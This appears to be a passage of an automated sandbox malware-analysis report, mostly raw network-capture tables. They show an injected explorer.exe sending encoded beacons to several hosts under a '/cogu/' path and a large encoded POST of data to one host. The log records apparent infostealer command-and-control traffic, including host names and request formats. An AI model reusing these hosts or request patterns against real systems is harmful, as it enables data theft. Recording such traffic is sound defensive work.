ZGraQ6AmBF1rD(dBD7Wp96I6qsNQvm9ycoBbXdE0U~5av8cMb1-37IIpbQrr9hZn2QKa1xngtA3lLVLXQHAiweOOhddE5tshmWNuWI1yqar4P41~QjuaGs0Qdlby_l0JjEhaiYcEVkhwRuH5dKPNIq4TXrnTIqKuhhWdTQhOTofr6N5nerfo2Mo77XgWVx_NgdvtH38xUnjZNC6age0Tq2VXGs3nWSXT56JfBKRLI(sOw5Mv2jB5WuBKcmnEJKVymtGJxg7~PCPmbr9S-EEtVyrN71HDXkevZ7eOvBW2l29QzI27_jy7QN1n9MYOLuwC_XbPEnzuEh6kluq1nysMf03A4AdqefyOmZAALDFnwI8uiBRAG8AIumquTtUpQPizzmtds0dKM8_Sa(X94CJCtWjCkG1OJ24f7pjIUwBeEqwSbagvwLxHpZcMVgsKuVxOHrBDqsfCc4qJQ61pu5vzzOMMcIMEAOUTt2BBYMstblcDXN1ahHPfT5M13LQzMBKaTLOSdUb9XVqNh63z_MsaEAVAdYymt7xtqE9xfi3NALsV47cCfp1bRrmN0sEXpW5cJDHFJ(z1ZBmaIVO(XbsnequVpO4HOF1Ygh-yTtRCngwAnniNHtzkx2zfV9Af_wK8aV5uwIqHWzrcV87lpvI1qkxfECz7YeRYnNvF2JjHEvCGObGvnYKXlI0GdEaaeM530q2g5086fsszATq6e5LQSxGZqHEBCuptjFc588xwzEQgn8XOtEPYWPGBr~r96PsSHPYjBbkBiBKpyaQ8UjjzhX6is~YSNaCJJdVY75II7qP2SO15alLOH4sn0E3DexVGJtMZImCTfioYSH0pdg_M-Kj8BBD(lr-ot5z5CnyfLBkAz5u18Wrq8KwiDdTH5bbZXqundPxHans6d5GRyAo~RES2SSccyvdSEwAa8XA51AY~ahoMFmLyrjlG0u0FrygImrO9tIpu4Vm4zqioee3ZmY3JwIY89V8gn4exy0VlXxY(ss_OIczknKuDseANPYyVOeID3txt3mwV611m7UIC55O6hAidn6SJUy01UKJIa1x1ikF7qjsUYTZpx15j8ffc-kLrZZ9vCTbnmSAzoyAUr8WO4D81Y2gEOxL~Ja-YXGMWcKk3g057xS_YnMShSIC3DKhw1C4yOAjJNYXf_4YTmjN1XOO2g1VZGyx6ueary2THp~pHxaC49RShTB09m9YiG(KhcQM0Dwc3JmT2qJiWaiU7ZL80_DfNwimTwlPEGPF8QQGmPgnV_DOjE0lgHGyt8nFIJXCBhmFrMlX9wmnHQCwyxlOsTZDTfpqRcgQq_~Nl4ZaoRTArfmRjtdpj53W9oATgWiLtsxvfKxVNQat18BHBHwOhZHgbzAXdwJKfyoFaaCDmc7D9lpgFyfB4B8Y3rj7EzLTwzvGj1fLm1jJqT4u91WWNQcmv6IOofd-CqcswwDp5YLdH23rG02cAjb8rii3Bug5g-9us
Oct 13, 2021 15:51:14.870830059 CEST	6693	OUT	Data Raw: 63 54 50 6d 59 72 7a 33 58 7e 64 6d 52 42 45 47 6a 61 68 57 55 73 54 55 74 58 63 70 75 78 53 34 62 42 72 30 34 57 69 6a 70 34 66 45 6c 6c 73 47 6a 77 61 56 6b 64 50 49 58 55 44 6f 42 72 45 41 39 75 61 64 38 74 45 45 49 36 33 32 32 6c 42 6d 7a 43 Data Ascii: cTPmYrz3X~dmRBEGjahWUsTUtXcpuxS4bBr04Wijp4fEllsGjwaVkdPIXUDoBrEA9uad8tEEI6322lBmzCgcEqk4D(nGmmvfMu4WEdml2nJN53NKTcp3qNEkWtWYu(-jRMSNIrOEh3r0BrtxKE46jUygt9MY6TzfF33viZvercELpEsC_sk(-6Cq1AzJ8o_X7a5OB74ynmj3n~LanjBIhOlflGv7S3jwBQt2SRPSGi3067hsNeS
Oct 13, 2021 15:51:14.870882988 CEST	6696	OUT	Data Raw: 37 69 69 43 41 78 5f 54 61 74 39 30 69 6f 6c 46 6b 28 42 62 6c 4a 72 6a 4d 61 58 30 50 7a 45 38 30 61 4b 50 78 4f 35 48 7a 76 69 42 41 78 68 69 71 62 67 58 72 63 57 7e 37 39 67 5a 59 48 2d 36 41 62 69 49 54 49 64 7e 79 6b 45 59 6e 74 55 4c 76 61 Data Ascii: 7iiCAx_Tat90iolFk(BblJrjMaX0PzE80aKPxO5HzviBAxhiqbgXrcW~79gZYH-6AbiITId~ykEYntULva5tMYUYFPZZFrDZgbzGomhjuj7libYGLTTlaSTLVdzz5ljB39igeUP2KPbnBcY6D0kC0VIN0R9FUpdrNzabmRmg9tf3hsBgIPuvNxu069Flncd98v9xNDYnp9Oc7N_sfNnI_PFa5gflH1_zehxUDMi15RhunmuI0cv
Oct 13, 2021 15:51:15.031009912 CEST	6701	OUT	Data Raw: 32 30 65 4e 54 37 53 7e 4e 71 6e 48 35 75 75 46 34 4d 62 43 6e 77 35 56 63 36 4e 6e 33 62 5a 36 4e 28 5a 57 4d 4c 45 6b 35 61 55 41 4c 79 4d 30 5a 56 58 36 2d 51 33 76 55 68 70 53 35 55 4e 35 74 75 71 4d 66 33 50 48 37 62 52 71 4b 4f 44 71 52 28 Data Ascii: 20eNT7S~NqnH5uuF4MbCnw5Vc6Nn3bZ6N(ZWMLEk5aUALyM0ZVX6-Q3vUhpS5UN5tuqMf3PH7bRqKODqR(5Evc061gP4WiU3mIFgT7KcgeCVBMPCfp4unGv5B6LshG1(Jrm8iluE21PkmFIJTb7sFzp2EPPhbcR1eVEpD8fw3RmYIuAp0B13pJHdeUHtOKdVeKnWqZJZQR0Ff6ORzkLZMZfE9(UDTkGe_(62gEhsgxC0qgLobJB
Oct 13, 2021 15:51:15.031219959 CEST	6704	OUT	Data Raw: 6f 52 50 39 58 37 75 4a 51 74 4a 62 78 7a 51 4a 4e 66 62 47 53 63 74 79 68 66 59 35 6e 4e 47 45 38 43 75 6d 30 39 31 61 76 30 61 77 43 36 4d 4e 38 46 76 4d 50 43 30 61 5a 76 54 30 6b 74 76 30 61 71 71 41 41 74 54 76 39 38 4a 44 64 45 6b 6a 77 6d Data Ascii: oRP9X7uJQtJbxzQJNfbGSctyhfY5nNGE8Cum091av0awC6MN8FvMPC0aZvT0ktv0aqqAAtTv98JDdEkjwmNUAUpTcUB(nF6qikU6w3xtbdLhzA6YHqnsJYTL_dKjtjzxCc-7RmVKoNsznOhS_viddVCWLG8idTwnHehWjetpF~IKKIdOZ7_gCKKU7djDZnQd8U3N92ABkyh2c9Dtj91jWQ0~RxDALWbZgXA9Lk32hTlRc(C5Od3
Oct 13, 2021 15:51:15.031404972 CEST	6717	OUT	Data Raw: 6f 34 43 6c 5f 65 6f 62 4f 42 4f 69 50 63 5a 47 55 36 69 30 6f 34 6c 63 34 79 75 4d 51 45 63 46 4b 36 70 4d 73 45 57 6b 6a 47 73 52 48 6a 4d 48 4a 6d 49 77 4a 69 49 70 52 36 58 4c 70 72 50 59 74 64 4e 49 61 46 41 6c 72 76 66 36 6b 38 6d 49 74 43 Data Ascii: o4Cl_eobOBOiPcZGU6i0o4lc4yuMQEcFK6pMsEWkjGsRHjMHJmIwJiIpR6XLprPYtdNIaFAlrvf6k8mItCw5MkHns9RR1K8yk8zk7MrXzsJfIqO1RjD2xKKouqiqfjJpxL0LvV6ZofnFYnr23XTUH2aWIiqga0Io8KKeZUJKH3CHf4HwDidoJ1AtB9hkWKgL0KJQ9XWOy8hBdbJ2PEdj4bYUAuX5-2X7bK_42dZ5kBWeL6SlKoU
Oct 13, 2021 15:51:15.031635046 CEST	6723	OUT	Data Raw: 42 31 70 41 53 6c 55 34 4c 75 46 6c 70 4b 49 38 43 5a 67 66 77 64 64 43 71 75 51 50 54 51 55 4b 38 6c 6d 6e 6d 46 73 77 4a 38 55 52 32 66 78 46 31 4e 5a 61 36 77 79 6c 74 44 62 56 53 71 4a 49 79 76 51 77 34 65 70 55 41 39 69 4b 4c 65 6d 5a 36 71 Data Ascii: B1pASlU4LuFlpKI8CZgfwddCquQPTQUK8lmnmFswJ8UR2fxF1NZa6wyltDbVSqJIyvQw4epUA9iKLemZ6quZngd4-37ofQ9nLbbWAflH-7IteCAeepE4kqlmCmzxGeC9byTNa0_vMwejt0oIFU-s5JTt0nxq1DBWWfsr_PmtoI2caKHRujY7AsSNlYwrcZyTxCazfqR0FyfCBOMDL7DJYYOBQAjPPRV9n34xHL2Z_HWnl6EFijW
Oct 13, 2021 15:51:15.191195965 CEST	6728	OUT	Data Raw: 6a 44 63 30 48 53 75 4b 67 31 31 28 72 39 7a 34 68 6e 59 34 41 6f 43 6a 73 62 72 39 36 30 54 66 65 4c 78 61 62 44 61 42 48 6a 4e 4c 6d 58 4b 7e 6a 70 67 65 58 43 4c 47 73 31 77 79 70 79 68 42 31 58 35 53 63 77 47 6e 2d 73 6b 65 69 70 71 39 42 39 Data Ascii: jDc0HSuKg11(r9z4hnY4AoCjsbr960TfeLxabDaBHjNLmXK~jpgeXCLGs1wypyhB1X5ScwGn-skeipq9B9QwmTPyODRP-gCZCI7HgXBNRHF(QlWV9ZwbjC_gXGHqc5us0la~Z1mI61bv63fEbCQKS5Q2AGDZpyaMEyeImZOPxol~puwPU3PFQ~iAoQQu8TBFDxRs2ukkJayWP75gHRYcuZu93RSN2YNtP9cPJ(c4KHmWrUgFzDB
Oct 13, 2021 15:51:15.191427946 CEST	6731	OUT	Data Raw: 32 52 38 77 75 6d 36 52 64 31 66 52 4b 6e 76 56 6a 76 39 36 65 4b 4d 72 56 54 69 53 56 4e 4e 4f 74 63 5a 4d 52 31 67 72 68 6f 74 43 79 72 44 38 68 41 6a 75 4b 4e 5a 70 69 68 6a 4e 62 37 4e 57 55 37 30 46 74 42 66 57 43 7e 46 4c 64 56 54 68 58 28 Data Ascii: 2R8wum6Rd1fRKnvVjv96eKMrVTiSVNNOtcZMR1grhotCyrD8hAjuKNZpihjNb7NWU70FtBfWC~FLdVThX(_x3(CD8MXzxdSYAsGRk4FrDftiFYaUHadFHKADJDsipnncul4mKaFLxTbj41aWtLBsDjtVLtj1FUOIZHYbhD381(2ycWkLmPekld3h0DHtMjaXctrK1X41agq1T5-jQ0tvJ0tPcaXh_rFs0PZMVPA7KCo8IZfcLHm
Oct 13, 2021 15:51:15.191613913 CEST	6744	OUT	Data Raw: 51 77 71 7a 41 4b 61 70 71 36 36 52 5a 75 32 6a 30 32 38 65 57 70 6f 47 47 65 35 4e 4e 46 69 4f 72 76 33 69 59 34 36 68 6b 4a 6f 71 65 76 73 4a 76 79 63 43 7a 6b 32 4b 6e 73 35 33 6b 42 63 6c 59 44 54 53 39 6f 52 58 30 68 48 4e 34 72 37 78 38 42 Data Ascii: QwqzAKapq66RZu2j028eWpoGGe5NNFiOrv3iY46hkJoqevsJvycCzk2Kns53kBclYDTS9oRX0hHN4r7x8BAotEgQbkBCvw755wCprYP~ZQNv20kdRs1y4eBVmkutkxHAfrfuf7neQltAU(kyKRxFbSdxOwsMqI42GsxNAn3YXthouqks6kFcJl8O6r_3139GLo0IZFihMp9VhAiDkh8k4MGh7ExRzoAqQwt50TGG3HhirfAjT25
Oct 13, 2021 15:51:15.191800117 CEST	6760	OUT	Data Raw: 38 65 57 48 74 34 6c 50 4d 61 6d 55 53 38 4c 35 33 77 36 69 56 69 36 6b 34 4c 51 56 54 62 74 75 4d 51 53 5a 34 36 6c 62 62 61 58 6a 64 70 48 77 64 6c 55 42 45 53 7a 7a 47 5a 6b 38 43 78 73 46 43 35 47 68 58 76 77 54 45 68 44 34 66 6f 58 76 44 52 Data Ascii: 8eWHt4lPMamUS8L53w6iVi6k4LQVTbtuMQSZ46lbbaXjdpHwdlUBESzzGZk8CxsFC5GhXvwTEhD4foXvDRlfV38SzrIwvS7EaU9RQA42q2Khq4fMfF-rPpIDfJsRbovHmr4GB9i~o6lI0dVK4Qv0gW1V3nm5FFY0dNGEhR8N1jW7H1XdNrcznN64Ary86e0RtWmtwLm7jNi7RseRqNQ(JL5MknXBC4697~zF3Jx9JXyz1d6J4b2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.11.20	49822	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:51:15.031754017 CEST	6723	OUT	GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1 Host: www.shopsharpgraphics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:51:15.222136974 CEST	6777	IN	HTTP/1.1 302 Found Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private Date: Wed, 13 Oct 2021 13:51:15 GMT Location: https://www.shopsharpgraphics.com/cogu Set-Cookie: publishedsite-xsrf=eyJpdiI6Imo0TzlNWmVJOXYzZE94blk5UVdZWHc9PSIsInZhbHVlIjoidkJ6N2c4RndsU3dHaVwvNmFtRlBaNlNRT0h5TUZ6MGFHY0x5THErYUM3MGNONDF1U2xHN2FSMWk4cHlLWmZcL3dRTjdyVHgwZVZSZmRNeEFKOHFQRW1FNXF3ekRjSmRHbTJaZDRDZTMwd2k1eDJOMUxhR3VIRFdtejlGOGFRT1dobCIsIm1hYyI6ImRkNzZjY2U0OTRhODZjMzA5NTYzYTk1M2U3Y2NlNjk1OWNhZDIxYzhhMjZjZGViOTZlOTc4ZWQxNDU4YTc3ZTIifQ%3D%3D; expires=Wed, 27-Oct-2021 13:51:15 GMT; Max-Age=1209600; path=/ Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRidTA1WlZUTlpSUThuSTF4blUxS0E9PSIsInZhbHVlIjoiRDF1djJMUzFYME5cL3FvUTZHazJyQTlrdk9GMXVRaWQzQTVRMDNNWXl1UmFTdGlCWWtOUHRTcTRkWHlZV3FQcEdcL1JkQzVscnR5djhOWFZYTTJBMTVsNUZqN0dQZFwvWXY2aG4xNDNiTjRWU0puQ2xHc1NoXC8wV2kzWXpYc0VlQXhYIiwibWFjIjoiZmJiMDhjZGRjZWQxNDcwOTI2YjU0NWQ2OGQ3YmUwMTRkYmMzZjlkNzBkYWQ0MjE2ZWYwYzQwZjUyNzlkMDU2NSJ9; expires=Wed, 27-Oct-2021 13:51:15 GMT; Max-Age=1209600; path=/ Set-Cookie: PublishedSiteSession=eyJpdiI6IjVyVDI4VElDTnpwNk1VUUV5RmkxSkE9PSIsInZhbHVlIjoiKzNNTFlCeFY2WkNkbXFnMjBreVBTSlNQb3l3U3B2SWMyRmU5T3FldXNET0FKb2JKMm9XVmd5ZHR0TGhqeU9TZDNtMWRzZ05qZjQzTllGdFoyUTdxS0NTSjJiZGVBajl2eEdxYnllOTN Data Raw: Data Ascii:
Oct 13, 2021 15:51:15.222222090 CEST	6778	IN	Data Raw: 4f 57 39 33 5a 32 46 61 61 32 46 75 4e 33 6c 58 5a 33 4a 36 61 47 4a 75 54 47 63 31 64 6c 63 69 4c 43 4a 74 59 57 4d 69 4f 69 49 35 59 6d 4a 6d 5a 54 56 6a 5a 57 45 79 5a 47 4d 34 4e 44 41 7a 5a 6d 51 31 4f 54 63 79 5a 6a 67 79 4d 6a 63 78 4d 6a Data Ascii: OW93Z2Faa2FuN3lXZ3J6aGJuTGc1dlciLCJtYWMiOiI5YmJmZTVjZWEyZGM4NDAzZmQ1OTcyZjgyMjcxMjkyMDc0ZTY5ZDhiOTQ2MzgxMjU3NDJlNzUyNzA4NDA0NDA3In0%3D; expires=Wed, 27-Oct-2021 13:51:15 GMT; Max-Age=1209600; path=/; httponlyX-Host: grn17.sf2p.intern.weebly.
Oct 13, 2021 15:51:15.222259998 CEST	6778	IN	Data Raw: 31 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d Data Ascii: 18e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.shopsharpgraphics.com/cogu'" /> <title>Redirecting to https://www.shopsharpgraphics.com/cogu</title

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49826	172.217.168.78	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.11.20	49823	156.239.224.4	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:51:41.018356085 CEST	6819	OUT	GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1 Host: www.alo360.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:51:41.671710014 CEST	6819	OUT	GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1 Host: www.alo360.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.11.20	49838	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:43.893030882 CEST	7492	OUT	POST /cogu/ HTTP/1.1 Host: www.nu12.online Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.nu12.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.nu12.online/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 66 54 54 39 46 6d 4e 4c 39 69 36 77 6c 51 7a 58 51 4d 56 37 71 44 52 43 37 44 34 46 59 55 7e 63 71 61 6e 54 30 52 42 74 4a 6c 4a 77 48 52 71 4e 4a 45 37 57 61 70 34 67 35 69 50 57 49 38 54 61 4c 63 6e 6d 4e 6a 31 51 4d 65 44 76 47 65 53 5a 42 51 51 70 34 61 4c 53 32 32 79 42 74 36 4b 46 65 74 55 59 46 4f 52 69 79 6e 36 42 71 49 38 74 37 67 33 79 45 4e 31 54 4a 4a 44 77 76 37 64 51 71 45 6f 47 43 51 42 43 53 51 5a 68 69 4f 45 37 52 62 74 51 70 71 52 4c 76 72 4d 56 67 45 42 4a 71 5f 58 57 30 47 63 6a 6c 6d 38 33 41 30 67 6b 70 65 4a 5a 48 42 6d 64 66 4a 39 6c 44 66 6e 45 68 55 32 4c 41 72 59 6f 34 41 45 50 75 4d 7e 77 36 2d 64 61 4b 42 4e 2d 70 30 62 33 7a 6b 65 42 59 61 4f 71 48 76 44 32 34 69 4c 52 39 34 66 65 56 75 39 51 37 4b 59 6d 55 32 4c 5f 72 6c 50 6a 4b 6c 5a 63 39 72 66 65 58 7a 67 5f 49 42 4f 76 41 34 7e 49 32 5a 6b 75 53 53 64 55 59 4a 51 55 4b 75 61 58 52 4e 69 65 70 33 41 47 74 58 6d 6a 31 61 4d 76 75 37 74 34 36 55 32 74 7a 5f 66 53 67 59 38 54 39 41 34 47 78 6e 70 68 6c 4d 33 2d 6b 6e 69 72 58 68 30 54 4d 48 45 31 75 6c 78 57 53 69 59 6c 68 73 61 54 34 73 36 58 72 6d 52 7a 72 37 4f 30 38 45 35 38 43 73 6e 6c 59 45 6d 76 7a 67 69 4b 71 6f 35 39 41 34 62 2d 68 42 57 79 36 53 58 45 7e 36 47 77 6a 33 62 48 64 48 70 50 6c 6c 47 5a 34 6f 38 6b 6f 6b 6a 63 33 58 62 75 62 5f 47 61 78 67 47 46 56 78 4b 5f 35 62 53 6b 50 43 64 52 43 69 4e 52 79 62 51 56 6c 66 38 4a 79 50 48 5a 4c 70 33 7a 45 35 53 7a 4a 6c 58 7a 47 55 68 72 32 33 78 4a 74 72 67 7a 4c 76 58 41 56 48 49 65 6f 65 46 4d 75 52 7e 4f 62 51 32 4d 79 33 39 70 4b 4b 64 5f 50 52 73 4e 72 75 53 65 78 76 75 75 63 58 52 73 6d 53 74 30 4f 72 69 50 38 31 36 5a 6e 58 66 4c 48 54 4e 2d 58 42 76 59 75 5f 49 55 30 4d 6f 6f 4b 72 28 46 79 76 50 4b 49 38 36 55 58 45 64 78 46 4d 56 6f 65 55 6b 44 6d 32 63 38 52 77 6b 6e 7e 4e 6e 37 49 58 74 66 42 62 72 35 46 41 7e 77 48 52 78 6a 50 2d 6d 67 76 30 6d 62 68 48 52 63 39 47 68 41 70 42 34 63 58 56 68 6a 50 52 44 7a 54 69 41 43 57 72 38 72 70 77 38 55 6c 62 33 66 38 56 70 2d 47 56 4e 67 64 2d 44 56 4a 59 34 6c 6c 71 6c 54 4c 31 57 68 70 70 62 67 4f 6d 7a 69 6a 59 37 35 48 61 39 50 31 6f 6a 67 73 37 56 7a 28 4c 62 61 6d 4a 4d 59 78 6f 4a 33 7e 4b 28 2d 69 52 33 72 39 35 63 2d 4a 31 6b 66 69 51 38 6d 65 79 34 62 32 45 63 4b 6b 68 7e 79 47 31 7e 75 6b 6a 7a 79 59 4c 6c 70 56 36 76 42 56 57 6d 48 79 76 36 69 62 48 62 5a 28 71 78 6b 72 41 4d 4d 39 61 59 37 65 53 59 66 28 55 69 6a 30 6d 6c 42 6d 66 70 31 61 79 75 38 69 61 52 77 6e 33 59 6e 7e 38 69 6e 53 6b 33 7a 4f 74 4e 4d 63 64 38 4f 59 4e 51 62 72 45 68 31 6e 53 4b 75 6d 69 43 46 74 69 43 54 4e 78 5a 45 56 51 7e 61 65 34 78 63 5a 44 43 6b 37 6b 45 4b 6d 75 6e 59 6a 65 62 38 71 49 48 55 6d 79 67 31 77 38 51 53 53 36 57 45 31 5f 67 2d 75 36 6c 74 47 54 4d 63 6e 34 44 63 72 33 57 4c 31 79 30 6c 43 53 5a 64 43 65 4e 36 51 76 53 71 73 77 77 70 70 78 6d 35 4b 30 6e 6e 65 35 72 53 6b 65 4a 55 28 53 74 45 78 5f 38 39 49 54 4f 56 47 30 51 39 78 55 31 50 65 57 78 39 72 4f 75 41 77 41 46 79 6b 71 63 5a 7a 49 72 61 4b 4c 56 4b 4a 6b 65 32 46 51 62 33 61 6b 78 45 64 38 61 73 57 58 53 6a 72 35 48 41 61 51 77 6c 4e 48 70 62 28 6a 52 4c 45 47 73 35 58 41 30 6a 70 4c 56 45 6f 33 45 4f 79 57 59 74 31 52 31 63 50 66 75 4f 30 6f 6b 46 56 47 47 79 42 6d 61 76 30 72 57 45 69 41 54 31 41 4b 68 46 50 55 57 6d 72 50 32 46 68 46 50 39 38 46 30 36 58 66 72 2d 78 32 54 69 57 76 31 6b 74 61 6d 4a 6a 4d 59 4d 76 41 6d 65 6a 65 50 77 53 55 46 2d 28 55 43 34 7e 67 37 69 64 6f 76 33 34 68 28 48 56 55 43 39 46 36 68 71 43 4d 64 42 70 79 65 64 38 4e 7e 78 41 50 38 76 36 2d 6f 74 45 4e 65 45 35 6c 31 55 47 39 51 31 41 6e 47 48 48 35 6f 49 63 4d 4c 72 4b 4a 4c 31 68 4c 69 6f 62 5a 4d 53 53 41 42 4f 77 4b 4a 74 66 61 30 44 62 6b 7e 75 4f 4d 54 51 66 78 34 39 4e 77 58 52 35 4d 53 30 73 74 77 5f 42 5f 78 6d 63 76 55 78 56 31 63 35 33 43 4b 4d 46 52 73 2d 65 5a 66 6d 72 38 4d 6b 54 59 42 52 31 63 73 4a 30 68 70 61 41 49 39 71 52 46 44 46 34 4f 36 52 73 42 6b 4b 54 4d 45 6e 48 62 6f 39 78 38 44 34 51 70 46 6b 59 56 77 4a 79 59 64 30 28 62 43 4d 65 57 55 44 70 68 6b 73 73 69 64 46 4e 2d 6c 36 39 31 43 73 Data Ascii: E6=fTT9FmNL9i6wlQzXQMV7qDRC7D4FYU~cqanT0RBtJlJwHRqNJE7Wap4g5iPWI8TaLcnmNj1QMeDvGeSZBQQp4aLS22yBt6KFetUYFORiyn6BqI8t7g3yEN1TJJDwv7dQqEoGCQBCSQZhiOE7RbtQpqRLvrMVgEBJq_XW0Gcjlm83A0gkpeJZHBmdfJ9lDfnEhU2LArYo4AEPuM~w6-daKBN-p0b3zkeBYaOqHvD24iLR94feVu9Q7KYmU2L_rlPjKlZc9rfeXzg_IBOvA4~I2ZkuSSdUYJQUKuaXRNiep3AGtXmj1aMvu7t46U2tz_fSgY8T9A4GxnphlM3-knirXh0TMHE1ulxWSiYlhsaT4s6XrmRzr7O08E58CsnlYEmvzgiKqo59A4b-hBWy6SXE~6Gwj3bHdHpPllGZ4o8kokjc3Xbub_GaxgGFVxK_5bSkPCdRCiNRybQVlf8JyPHZLp3zE5SzJlXzGUhr23xJtrgzLvXAVHIeoeFMuR~ObQ2My39pKKd_PRsNruSexvuucXRsmSt0OriP816ZnXfLHTN-XBvYu_IU0MooKr(FyvPKI86UXEdxFMVoeUkDm2c8Rwkn~Nn7IXtfBbr5FA~wHRxjP-mgv0mbhHRc9GhApB4cXVhjPRDzTiACWr8rpw8Ulb3f8Vp-GVNgd-DVJY4llqlTL1WhppbgOmzijY75Ha9P1ojgs7Vz(LbamJMYxoJ3~K(-iR3r95c-J1kfiQ8mey4b2EcKkh~yG1~ukjzyYLlpV6vBVWmHyv6ibHbZ(qxkrAMM9aY7eSYf(Uij0mlBmfp1ayu8iaRwn3Yn~8inSk3zOtNMcd8OYNQbrEh1nSKumiCFtiCTNxZEVQ~ae4xcZDCk7kEKmunYjeb8qIHUmyg1w8QSS6WE1_g-u6ltGTMcn4Dcr3WL1y0lCSZdCeN6QvSqswwppxm5K0nne5rSkeJU(StEx_89ITOVG0Q9xU1PeWx9rOuAwAFykqcZzIraKLVKJke2FQb3akxEd8asWXSjr5HAaQwlNHpb(jRLEGs5XA0jpLVEo3EOyWYt1R1cPfuO0okFVGGyBmav0rWEiAT1AKhFPUWmrP2FhFP98F06Xfr-x2TiWv1ktamJjMYMvAmejePwSUF-(UC4~g7idov34h(HVUC9F6hqCMdBpyed8N~xAP8v6-otENeE5l1UG9Q1AnGHH5oIcMLrKJL1hLiobZMSSABOwKJtfa0Dbk~uOMTQfx49NwXR5MS0stw_B_xmcvUxV1c53CKMFRs-eZfmr8MkTYBR1csJ0hpaAI9qRFDF4O6RsBkKTMEnHbo9x8D4QpFkYVwJyYd0(bCMeWUDphkssidFN-l691CshgVlhNHaEEsy2mHc5MwnJfMDE_hIRIZknjx7b4QC(7OnI_ryah0UfQMVQgl9imtE7upcBHrZZW~53iGeqObQlfCt2uusL3G-ukow4Slilam8Kl6Iyx8issfImIcgf_JU3phv(psTkBtGwSNmdKyozt0QjBkHD4A8o0q3qlbW8l(0T9vycPPyliQ2jN(tXJcBTqY6raBtOWMXHdtFEmIL8vjKvVmsF9DObQ4cu4FB~NnpV9TJTuqhXxOXqei15NlDrOL9O6dZ6mchCl9jCDKmPX3SGOp2(qH8plbq2mS-xQLwu_OxHileIUGG4U92MVlcEq(1hzXXeZrXtRmfkz039NxIr9a6Ez02a75Q5a5XZchd(khfv3wXmq2_5HdD6KeARBgH2cxefKUpqBmeY_t8fWHIq2fxV1FB0QHO4XoC7O5B4mAphJJMRcQce1sRSZLphnOjNRrBdqcQKP12vEGycklgCQjfjf9BfMioE-xTf0zginJSNyrIEQi7hcGUtct7EZ~NIH0nGKkZijNmQNFMoKd4AsPuxLb1gjApylqBrcY0XLxOKTKaZzF_UGXhzfAG5_MyA8J7br~_jVXWuowolwDsvuVKJ1s1pTHgb-Jc73W18oRAht(A7cD8NEo6WqQfvBWhZtvWy2hk4fXHvHcdwcB-WbZkYsOcLasRUhOdwpjJCeg1fY57aQSKLo93Lj7W2-ZR2lzhwVWsXO8IUqvnLp23YjUuyLXtz7rTBz5pNS(6INPjAFVhAmfZnPN9k5vKalmLyMaQ6A1lhR6IxGgbYAscPIwWXrHfEspBznKiRda_~TDR6LT8JxZqi5a6BrjNVd34E_oIBXIl4BPk2CsamYAWWonosYTnEnhJg8u3czdAXw2_P2LQX37Z58NOCGQJhH2nmzHkos3YkHtUcZUHucdwWePUhJtaPwFxiK2qEGhdb6WY~XexO2sPy6KdrBMV0DVISedwMQAxJ9uNNLUrY7P_y2OAnW8FsxpYcqnUYanoaGNGzykaF5YAFkz6i0yu77JMZ-m0z6ZvDdoA9xWbzHva~MT3ybqH6a5HSjM66A0Lq-ce45SDW-n60W4I0tsJj5IDnT0CTdq2~XYE8EIBJ3S3klcZmvhC2TJ4UfJhEnqOJR7UH3jv~R5bplMSym00n7lR9AROrP0KqEqesZ4toG5WZOnlbAPU5j~XrkYpq66ueL2eKfZ64V7ywEYF(RqfQZGU8VP7Y6CSobjs2LJmhDk0FvWci_ZFJyJL(XtADk5_0j(VCDGRrR6B0C2JdBahT4v5(XeVaLt19g4_UUUQFh9fqf3fWo6za9YcZ9fPHBTP7q87dDxFFaOO~XfJN8J9TBls62NVSxr6(Ilr49jNyiBXYPfxenoYYewlAgb500nQHkQfJzH-95RabRjnXYoN6GN9PRGG3ApciMgnXT1p7SY71a6-AP9xY7xPU3MZInmpaIaFd4QX7ZhsOfN_WR9mH-DBdgNPRbmYNX0U1IGy(8KHd2XAZ-ypqBfNHdmF5TJOX7GmuRF9FRV9IFXWPWHy30(xopUcKK87d5iLMSHAwvZ6e_8_sTycb3C8gQawFEvHKjeEF2CK5AArXpS-lm3L4PPpXhVRe3CEeRafVrNejTnI4ALOGBerYHOfE49yMU~cvsGdXFoLu8Sh7OuX7FjtrX0P4rc-olSz5VIzvGDsf9kdgqOSZzDQ